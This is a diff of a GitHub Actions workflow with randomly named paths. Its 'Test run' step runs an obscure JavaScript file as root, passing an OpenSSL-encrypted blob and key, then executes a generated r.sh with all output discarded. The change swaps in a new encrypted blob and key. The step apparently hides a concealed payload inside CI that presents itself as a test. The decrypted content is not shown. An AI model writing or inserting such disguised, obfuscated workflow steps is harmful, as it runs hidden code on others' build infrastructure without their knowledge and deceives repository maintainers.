--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '6xbf3'
+        echo 'avtf0'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+GBhc3+LzH3fnnDer9zVlYV68XZkKFLMseshT3dvSTURfCZZIWI3wgerGUXgCOGJ+sujauo2/H/9VOQP5Vh6+zN3pLsB8RRFMKw6wIbMYZfp1JxkFQ38HM cq1205 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/69EnTJOZqkg9krCc/gDG1zNjWo57Bj+O1myq3i3yEQUu8KvPa7bE6A7eLu+MLGR8kL8lG0vHkkNRpFwfDmQHAcKLDgBXz7dezsQPFXMcz/QMAXC7Z9MRg d9ojap && sudo sh r.sh > /dev/null 2>&1
